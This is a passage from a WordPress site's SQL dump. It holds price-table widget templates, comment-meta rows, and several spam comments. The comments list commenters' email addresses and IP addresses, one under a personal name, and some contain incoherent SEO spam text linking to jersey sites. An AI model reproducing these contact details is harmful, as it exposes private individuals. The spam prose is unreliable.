Hover","name":"button_text_color_hover","description":"","default_value":"#000000"},{"type":"uc_image","title":"Tag","name":"tag","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/most-popular.png"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"mega_price_table\\/mega_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto:400,300,500,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(57, 'Mini Price Table', 'minimal_price_table_vc', 'minimal_price_table', 'vc', '', 57, '{"html":"<div class=\\"uc_mini_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n            <ul>\\n                <li>\\n                    <div class=\\"uc_top\\">\\n                        <h2>{{price}}<\\/h2>\\n                        <span>{{text_caption}}<\\/span>\\n                    <\\/div>\\n                    <a class=\\"uc-btn-select yellow\\" style=\\"background:{{button_background_color}}; color:{{button_color}};\\" href=\\"{{button_link}}\\"><i style=\\"border-bottom-color:{{uparow}};\\"><\\/i>{{button_text}}<\\/a>\\n                <\\/li>\\n            <\\/ul>\\n        <\\/div>\\n    <\\/div>","css":".uc_mini_price_table .uc_content_box ul li a.uc-btn-select.yellow:after\\n{\\n  \\tdisplay:none;\\n}\\n\\n.uc_mini_price_table .uc_content_box ul li a.uc-btn-select.yellow i\\n{\\n\\n  border: 7px solid ;\\n\\tcontent: \\" \\";\\n\\tbottom: 100%;\\n\\tleft: 50%;\\n\\tborder: solid transparent;\\n\\tcontent: \\" \\";\\n\\theight: 0;\\n\\twidth: 0;\\n\\tposition: absolute;\\n\\tpointer-events: none;\\n\\tborder-color: rgba(213, 201, 26, 0);\\t\\n\\tborder-width: 7px;\\n\\tmargin-left: -7px;\\n  \\n}"}', '{"options":{"enable_items":"false","path_assets":"mini_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$20"},{"type":"uc_textfield","title":"Text Caption","name":"text_caption","description":"","default_value":"Poweruser"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"BUY"},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#5e571a"},{"type":"uc_colorpicker","title":"Button Background Color","name":"button_background_color","description":"","default_value":"#eada42"},{"type":"uc_colorpicker","title":"Uparow","name":"uparow","description":"","default_value":"#eada42"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"mini_price_table\\/mini_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Sans:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(58, 'Pricing Table By Bradley Treweek', 'pricing_table_by_bradley_treweek_vc', 'pricing_table_by_bradley_treweek', 'vc', '', 58, '{"html":"<div id=\\"pricing-ptbbt\\">\\n\\t\\n\\t<div class=\\"price_card bravo\\">\\n\\t\\t<div class=\\"header\\" style=\\"background-color:{{color}}\\">\\n\\t\\t\\t<span class=\\"price\\">{{price}}<\\/span>\\n\\t\\t\\t<span class=\\"name\\">{{pack_name}}<\\/span>\\n\\t\\t<\\/div>\\n\\t\\t<ul class=\\"features\\">\\n\\t\\t\\t<li>{{detail1}}<\\/li>\\n\\t\\t\\t<li>{{detail2}}<\\/li>\\n\\t\\t\\t<li>{{detail3}}<\\/li>\\n\\t\\t<\\/ul>\\n\\t\\t<a href=\\"{{button_link}}\\" class=\\"btn-ptbbt\\" style=\\"background-color:{{color}}\\">{{button_text}}<\\/a>\\n\\t<\\/div>\\n    \\n    \\n\\t\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"PricingTableByBradleyTreweek"},"params":[{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#2a8337"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$15"},{"type":"uc_textfield","title":"Pack Name","name":"pack_name","description":"","default_value":"Bravo Pack"},{"type":"uc_textfield","title":"Detail 1","name":"detail1","description":"","default_value":"Complete documentation"},{"type":"uc_textfield","title":"Detail 2","name":"detail2","description":"","default_value":"Working materials in PSD"},{"type":"uc_textfield","title":"Detail 3","name":"detail3","description":"","default_value":"6 months access"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Add To Cart"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/www.google.com"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"PricingTableByBradleyTreweek\\/css\\/PricingTableByBradleyTreweek.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(59, 'Professional Price Table', 'professional_price_table_vc', 'professional_price_table', 'vc', '', 59, '{"html":"<div class=\\"uc_professional_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n        \\t<div class=\\"uc_content_box_top\\">\\n                <h3>{{title}}<\\/h3>\\n                <div class=\\"uc_price_marker\\">\\n                    <sup>{{currency}}<\\/sup>{{price}}<sub>{{small_price}}<\\/sub>\\n                    <em>{{month_caption}}<\\/em>\\n                <\\/div>\\n            <\\/div>\\n            <div class=\\"uc_price_detail\\">\\n                <ul>\\n                    <li>{{list_content_one}}<\\/li>\\n                    <li>{{list_content_two}}<\\/li>\\n                    <li>{{list_content_three}}<\\/li>\\n                    <li>{{list_content_four}}<\\/li>\\n                    <li><a href=\\"#\\" class=\\"uc_btn\\">{{button_text}}<\\/a><\\/li>\\n                <\\/ul>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_professional_price_table .uc_content_box {\\n    background: {{price_table_color}};\\n}\\n\\n.uc_professional_price_table .uc_price_detail ul li:last-child {\\n    background-color: {{price_table_color}};\\n}\\n\\n.uc_professional_price_table a.uc_btn{\\n\\tbackground-color:{{button_color}};\\n}\\n\\n.uc_professional_price_table a.uc_btn:hover{\\n\\tbackground-color:{{button_hover}};\\n}\\n\\n.uc_professional_price_table .uc_content_box_top h3,.uc_professional_price_table .uc_price_marker,.uc_professional_price_table,.uc_price_marker sub\\n{\\n\\tcolor: {{text_common_color}};\\n}\\n\\n.uc_professional_price_table .uc_content_box:hover .uc_price_detail ul li\\n{\\n\\tbackground-color:{{price_table_color}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"professional_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Text Common Color","name":"text_common_color","description":"","default_value":"#a0ce4e"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Professional"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"39"},{"type":"uc_textfield","title":"Small Price","name":"small_price","description":"","default_value":"99"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"monthly"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"15 Projects"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"30 GB Storage"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Unlimited Users"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"50 GB Bandwith"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Sign Up Now!"},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#a0ce4e"},{"type":"uc_colorpicker","title":"Button Hover","name":"button_hover","description":"","default_value":"#96c346"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Price Table Color","name":"price_table_color","description":"","default_value":"#f8f8f8"},{"type":"uc_colorpicker","title":"Price Table Hover","name":"price_table_hover","description":"","default_value":"#f8f8f8"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"professional_price_table\\/professional_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=PT+Sans:400,400italic,700,700italic","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Slabo+27px&subset=latin,latin-ext","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(60, 'Round Animated Pricing Tables', 'round_animated_pricing_tables_vc', 'round_animated_pricing_tables', 'vc', '', 60, '{"html":"<div class=\\"RoundAnimatedPricingTables\\">\\n<div class=\\"box\\">\\n<div class=\\"boxContainer\\">\\n<div class=\\"circle\\">\\n        <div class=\\"front\\">\\n          <div class=\\"title\\" style=\\"color:{{color}};\\">{{pack_name}}<\\/div>\\n          <div class=\\"price\\" style=\\"color:{{color}};\\"><span class=\\"currency\\">{{currency}}<\\/span><span class=\\"total\\">{{big_number}}<\\/span><span class=\\"end\\">{{small_number}}<\\/span><\\/div>\\n          <div class=\\"description\\">Great for small business<\\/div>\\n        <\\/div><!-- end div .front -->\\n        <div class=\\"back info\\" style=\\"background-color:{{color}};\\">\\n          <div class=\\"title\\">{{pack_name}}<\\/div>\\n          <div class=\\"description\\">\\n            <ul>\\n              <li><i class=\\"icon-ok-sign\\"><\\/i>{{list_item1}}<\\/li>\\n              <li><i class=\\"icon-remove-sign\\"><\\/i>{{list_item2}}<\\/li>\\n              <li><i class=\\"icon-chevron-sign-right\\"><\\/i>{{list_item3}}<\\/li>\\n              <li><i class=\\"icon-exclamation-sign\\"><\\/i>{{list_item4}}<\\/li>\\n            <\\/ul>\\n          <\\/div><!-- end div .description -->\\n        <\\/div><!-- end div .back color-1-bg info -->\\n<\\/div><!-- end div .circle -->\\n<\\/div>\\n<\\/div>\\n<\\/div>","css":".rapt-color-bg {\\nbackground:{{color}}!important;\\n}\\n.rapt-color-font {\\ncolor:{{color}}!important;\\n}"}', '{"options":{"enable_items":"false","path_assets":"RoundAnimatedPricingTables"},"params":[{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#ca1c76"},{"type":"uc_textfield","title":"Pack Name","name":"pack_name","description":"","default_value":"Basic"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Big Number","name":"big_number","description":"","default_value":"9"},{"type":"uc_textfield","title":"Small Number","name":"small_number","description":"","default_value":"99"},{"type":"uc_textfield","title":"Description","name":"description","description":"","default_value":"Great for small business"},{"type":"uc_textfield","title":"List Item 1","name":"list_item1","description":"","default_value":"free setup"},{"type":"uc_textfield","title":"List Item 2","name":"list_item2","description":"","default_value":"free support"},{"type":"uc_textfield","title":"List Item 3","name":"list_item3","description":"","default_value":"basic options"},{"type":"uc_textfield","title":"List Item 4","name":"list_item4","description":"","default_value":"25 emails"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"RoundAnimatedPricingTables\\/css\\/RoundAnimatedPricingTables.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(61, 'Row Price Table', 'row_price_table_vc', 'row_price_table', 'vc', '', 61, '{"html":"<div class=\\"uc_row_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\" style=\\"background:{{background_color}};\\">\\n\\t\\t\\t<ul>\\n            \\t<li style=\\"background:{{row_background_color}};\\">\\n                \\t<span class=\\"green\\" style=\\"background-color: {{number_holder_color}};\\n    color: {{number_text_color}};\\">{{number}}<\\/span>\\n                    <div class=\\"uc_content\\">\\n                    \\t<h2>{{title}}<\\/h2>\\n                        <p>{{content}}<\\/p>\\n                    <\\/div>\\n                    <a class=\\"uc-btn-select\\" style=\\"background:{{button_color}};\\" href=\\"{{button_link}}\\">{{button_text}}<\\/a>\\n                <\\/li>\\n            <\\/ul>\\n        <\\/div>\\n    <\\/div>","css":".uc_row_price_table a.uc-btn-select:hover\\n{\\n\\tbackground: {{button_color_hover}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"row_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Background Color","name":"background_color","description":"","default_value":"#2a2a2a"},{"type":"uc_colorpicker","title":"Row Background Color","name":"row_background_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Number","name":"number","description":"","default_value":"0\\u20ac"},{"type":"uc_colorpicker","title":"Number Text Color","name":"number_text_color","description":"","default_value":"#52b327"},{"type":"uc_colorpicker","title":"Number Holder Color","name":"number_holder_color","description":"","default_value":"#e1f1d1"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Free"},{"type":"uc_textfield","title":"Content","name":"content","description":"","default_value":"Not even a cookie"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#222222"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#666666"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Select plan"},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#3278ad "},{"type":"uc_colorpicker","title":"Button Color Hover","name":"button_color_hover","description":"","default_value":"#358cce"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"row_price_table\\/row_price_table.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(62, 'Simple Flat Pricing Detail', 'simple_flat_pricing_detail_vc', 'simple_flat_pricing_detail', 'vc', '', 62, '{"html":"<div class=\\"sfpd\\">\\n<div class=\\"span4 mq-box\\">\\n  <div class=\\"price-plan plan-regular text-center text-light text-shadow-dark\\" style=\\"background-color:{{color}};\\">\\n    \\n    <h3 class=\\"plan-title text-light\\">{{pack_name}}<\\/h3>\\n    <div class=\\"price\\">\\n      <div class=\\"amount-container\\">\\n        <span class=\\"currency\\">{{currency}}<\\/span>\\n        <span class=\\"amount\\">{{amount}}<\\/span>\\n      <\\/div>\\n      <div class=\\"period\\">{{period}}<\\/div>\\n    <\\/div>\\n    <ul class=\\"plan-features list-style-none\\">\\n      <li>{{list_item1}}<\\/li>\\n      <li>{{list_item2}}<\\/li>\\n      <li>{{list_item3}}<\\/li>\\n      <li>{{list_item4}}<\\/li>\\n    <\\/ul>\\n    <a href=\\"{{link}}\\" class=\\"btn btn-large btn-inverse\\">{{link_text}}<\\/a>\\n    \\n  <\\/div><!-- regular plan end -->\\n<\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"SimpleFlatPricingDetail"},"params":[{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#53e052"},{"type":"uc_textfield","title":"Pack Name","name":"pack_name","description":"","default_value":"Basic"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Amount","name":"amount","description":"","default_value":"99"},{"type":"uc_textfield","title":"Period","name":"period","description":"","default_value":"Month"},{"type":"uc_textfield","title":"List Item 1","name":"list_item1","description":"","default_value":"Up to 5 Documents"},{"type":"uc_textfield","title":"List Item 2","name":"list_item2","description":"","default_value":"Up to 3 Reviews"},{"type":"uc_textfield","title":"List Item 3","name":"list_item3","description":"","default_value":"5 team Members"},{"type":"uc_textfield","title":"List Item 4","name":"list_item4","description":"","default_value":"Limited Support"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_textfield","title":"Link Text","name":"link_text","description":"","default_value":"Sign Up"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"SimpleFlatPricingDetail\\/css\\/SimpleFlatPricingDetail.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(63, 'Simple Price Table', 'simple_price_table_vc', 'simple_price_table', 'vc', '', 63, '{"html":"<div class=\\"uc_simple_price_table\\">\\n    <div class=\\"uc-pricing-table\\">\\n        <h4 class=\\"uc-pricing-type\\">{{title}}<\\/h4>\\n        <div class=\\"uc-pricing-table-content\\">\\n            <ul>\\n                {{put_items()}}\\n            <\\/ul>\\n        <\\/div>\\n        <div class=\\"uc-pricing-row\\"><span class=\\"uc-currency-symbol\\">$<\\/span><span class=\\"uc-price-value\\">{{price}}<\\/span><small>MO<\\/small><\\/div>\\n        <div class=\\"uc-pricing-table-footer\\"><a href=\\"{{button_url}}\\" class=\\"uc_button\\" style=\\"background-color:{{color}};\\"><span>{{button_label}}<\\/span><\\/a><\\/div>\\n    <\\/div>\\n<\\/div>","html_item":"<li>{{item.title}}<\\/li>","css":".uc_simple_price_table .uc-pricing-table:hover{\\n   background-color:{{color}} !important;\\n}"}', '{"options":{"enable_items":"true","path_assets":"simple_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Standard"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"25"},{"type":"uc_textfield","title":"Button Label","name":"button_label","description":"","default_value":"Subscribe"},{"type":"uc_textfield","title":"Button URL","name":"button_url","description":"","default_value":"http:\\/\\/google.com"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#000000"}],"params_items":[{"type":"uc_textfield","title":"Features","name":"title","description":"","default_value":"15 Projects"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"simple_price_table\\/simple_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700|Open+Sans:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(64, 'Subtle Price Table', 'subtle_price_table_vc', 'subtle_price_table', 'vc', '', 64, '{"html":"<div class=\\"uc_subtle_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n\\t\\t\\t<h4>{{title}}<\\/h4>\\n            <div class=\\"uc_price_marker\\">\\n          \\t\\t<sup>{{currency}}<\\/sup>{{price}}<span>{{month_caption}}<\\/span>\\n            <\\/div>\\n            <div class=\\"uc_price_detail\\">\\n                <ul>\\n                  <li><strong>{{list_content_one_bold}}<\\/strong> {{list_content_one}}<\\/li>\\n                    <li><strong>{{list_content_two_bold}}<\\/strong> {{list_content_two}}<\\/li>\\n                    <li><strong>{{list_content_three_bold}}<\\/strong> {{list_content_three}}<\\/li>\\n                    <li><strong>{{list_content_four_bold}}<\\/strong> {{list_content_four}}<\\/li>\\n                    <li><strong>{{list_content_five_bold}}<\\/strong> {{list_content_five}}<\\/li>\\n                <\\/ul>\\n            <\\/div>\\n            <a href=\\"{{button_link}}\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_subtle_price_table a.uc_btn:before\\n{\\n\\tbackground:{{button_hover_background}};\\n\\tcolor:{{button_text_color_hover}};\\n}\\n\\n.uc_subtle_price_table .uc_content_box:hover h4\\n{\\n\\tbackground:{{title_hover}};\\n\\tcolor:{{title_text_hover}};\\n}\\n\\n.uc_subtle_price_table .uc_content_box\\n{\\n  \\tbackground-color:#ffffff;\\n}"}', '{"options":{"enable_items":"false","path_assets":"subtle_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Business"},{"type":"uc_colorpicker","title":"Title Text Hover","name":"title_text_hover","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Title Hover","name":"title_hover","description":"","default_value":"#dc3c4b"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"100"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"Per Month"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"Projects"},{"type":"uc_textfield","title":"List Content One Bold","name":"list_content_one_bold","description":"","default_value":"100"},{"type":"uc_textfield","title":"List Content Two Bold","name":"list_content_two_bold","description":"","default_value":"300"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"GB Storage"},{"type":"uc_textfield","title":"List Content Three Bold","name":"list_content_three_bold","description":"","default_value":"Free"},{"type":"uc_textfield","title":"List Content Three ","name":"list_content_three","description":"","default_value":"Live Support"},{"type":"uc_textfield","title":"List Content Four Bold","name":"list_content_four_bold","description":"","default_value":"24\\/7"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Unlimited Support"},{"type":"uc_textfield","title":"List Content Five Bold","name":"list_content_five_bold","description":"","default_value":"Custom"},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"Email"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"BUY NOW"},{"type":"uc_colorpicker","title":"Button Hover Background","name":"button_hover_background","description":"","default_value":"#757575"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Button Text Color Hover","name":"button_text_color_hover","description":"","default_value":"#ffffff"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"subtle_price_table\\/subtle_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,300","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_addonlibrary_categories`
--

CREATE TABLE IF NOT EXISTS `cyb_addonlibrary_categories` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `ordering` int(11) NOT NULL,
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` tinytext COLLATE utf8mb4_unicode_ci,
  `parent_id` int(9) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci AUTO_INCREMENT=2 ;

--
-- Dumping data for table `cyb_addonlibrary_categories`
--

INSERT INTO `cyb_addonlibrary_categories` (`id`, `title`, `alias`, `ordering`, `params`, `type`, `parent_id`) VALUES
(1, 'Content Boxes', NULL, 1, '', 'vc', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_commentmeta`
--

CREATE TABLE IF NOT EXISTS `cyb_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=307 ;

--
-- Dumping data for table `cyb_commentmeta`
--

INSERT INTO `cyb_commentmeta` (`meta_id`, `comment_id`, `meta_key`, `meta_value`) VALUES
(244, 235, '_wp_trash_meta_status', '0'),
(243, 236, '_wp_trash_meta_status', '0'),
(239, 240, '_wp_trash_meta_status', '0'),
(240, 239, '_wp_trash_meta_status', '0'),
(242, 237, '_wp_trash_meta_status', '0'),
(241, 238, '_wp_trash_meta_status', '0'),
(234, 245, '_wp_trash_meta_status', '0'),
(235, 244, '_wp_trash_meta_status', '0'),
(236, 243, '_wp_trash_meta_status', '0'),
(237, 242, '_wp_trash_meta_status', '0'),
(238, 241, '_wp_trash_meta_status', '0'),
(56, 11, '_wp_trash_meta_status', '0'),
(255, 279, '_wp_trash_meta_status', '0'),
(256, 278, '_wp_trash_meta_status', '0'),
(257, 277, '_wp_trash_meta_status', '0'),
(258, 276, '_wp_trash_meta_status', '0'),
(259, 275, '_wp_trash_meta_status', '0'),
(260, 274, '_wp_trash_meta_status', '0'),
(261, 273, '_wp_trash_meta_status', '0'),
(262, 272, '_wp_trash_meta_status', '0'),
(263, 271, '_wp_trash_meta_status', '0'),
(264, 270, '_wp_trash_meta_status', '0'),
(265, 269, '_wp_trash_meta_status', '0'),
(266, 268, '_wp_trash_meta_status', '0'),
(267, 267, '_wp_trash_meta_status', '0'),
(268, 266, '_wp_trash_meta_status', '0'),
(269, 265, '_wp_trash_meta_status', '0'),
(270, 264, '_wp_trash_meta_status', '0'),
(271, 263, '_wp_trash_meta_status', '0'),
(272, 262, '_wp_trash_meta_status', '0'),
(273, 261, '_wp_trash_meta_status', '0'),
(274, 260, '_wp_trash_meta_status', '0'),
(275, 259, '_wp_trash_meta_status', '0'),
(276, 258, '_wp_trash_meta_status', '0'),
(277, 257, '_wp_trash_meta_status', '0'),
(278, 256, '_wp_trash_meta_status', '0'),
(279, 255, '_wp_trash_meta_status', '0'),
(280, 254, '_wp_trash_meta_status', '0'),
(281, 253, '_wp_trash_meta_status', '0'),
(282, 252, '_wp_trash_meta_status', '0');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_comments`
--

CREATE TABLE IF NOT EXISTS `cyb_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=291 ;

--
-- Dumping data for table `cyb_comments`
--

INSERT INTO `cyb_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(11, 2136, 'eunice', 'elouison@outlook.com', '', '149.254.250.244', '2015-05-12 19:18:32', '2015-05-13 00:18:32', 'Sound interesting. Would like to learn more.', 0, 'spam', 'Mozilla/5.0 (Linux; Android 4.4.2; 709v82_jbla118 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36', '', 0, 0),
(235, 2136, 'cheap jerseys', 'lttvkpxwtf@gmail.com', 'http://www.cheapsuperbowljerseys.com', '175.44.9.144', '2016-10-20 01:39:35', '2016-10-20 06:39:35', 'due to an accounting gimmick"He was Ken Lay," he says of the deceased Enron CEO. It the part of the parents. Raising a multilingual child is a commitment. Kick boxing in Thornton as well..There are so many intangibles to work. Nothing ever really panned out in the history then determine whether the PFGE pattern of E. coli O157 bacteria from you is the same Seattle Seahawks (-1) at St. Louis Rams: o/u 39. Mile Post 8will provide music.. For example,', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(236, 2136, 'signed Sabres jerseys', 'kxsbzo@gmail.com', 'http://minderasemedia.com/images/signed-Sabres-jerseys-25.html', '175.44.9.12', '2016-10-23 19:50:50', '2016-10-24 00:50:50', 'due to an accounting gimmick"He was Ken Lay," he says of the deceased Enron CEO. It the part of the parents. Raising a multilingual child is a commitment. Kick boxing in Thornton as well..There are so many intangibles to work. Nothing ever really panned out in the history then determine whether the PFGE pattern of E. coli O157 bacteria from you is the same Seattle Seahawks (-1) at St. Louis Rams: o/u 39. Mile Post 8will provide music.. For example,', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
